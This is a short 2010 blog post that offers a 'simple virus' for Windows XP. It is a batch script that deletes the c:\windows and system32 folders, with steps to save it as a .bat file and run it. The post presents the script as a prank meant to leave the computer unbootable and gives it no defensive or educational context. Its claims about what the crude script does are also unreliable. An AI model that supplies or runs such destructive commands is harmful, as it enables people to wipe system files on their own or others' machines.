Search This Blog

Thursday, July 8, 2010

HOW TO CREATE A SIMPLE "VIRUS"

This "virus" is based on MSDOS code batch... it is too simple. will work in Windows XP

This virus when it is activated have no effect but after restarting computer it will not turn on. The system windows will be crashed depends on type of that "virus".

Here is txt code:

Code: Select all
@echo off
@del c:\windows\
@del c:\windows\system32\
pause
end




write this code in ( notepad recomend) and save it like name.bat
( extension .bat is important)

run it and u will se result....

ENJOY!!!

No comments: